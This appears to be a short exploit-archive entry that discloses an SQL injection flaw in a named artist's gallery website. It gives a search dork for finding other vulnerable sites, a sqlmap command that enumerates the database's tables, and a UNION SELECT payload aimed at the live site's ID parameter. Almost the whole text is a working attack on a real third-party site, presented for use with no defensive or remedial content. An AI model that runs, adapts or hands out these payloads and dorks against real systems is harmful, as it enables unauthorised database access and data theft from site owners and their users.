# Exploit Title:Rohana Laing SQL Injection
# Date:17.05.2019
# Dork :intext:" 2019 Rohana Laing" id=
# Exploit Author:Cerkuday
# Tested on:Windows &Kali Linux
#Demo
http://www.rohanart.com/gallery.php?ID=51&gallery=5
# Poc:
sqlmap -u "http://www.rohanart.com/gallery.php?ID=50&gallery=5" --random-agent -D rohanart_rohana --tables
http://www.rohanart.com/gallery.php?ID=50' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x69675657696870575343536d42425341784d5057456a666c44796d7445664e6e666e54674c536265,0x716a7a6a71),NULL,NULL,NULL,NULL,NULL#&gallery=5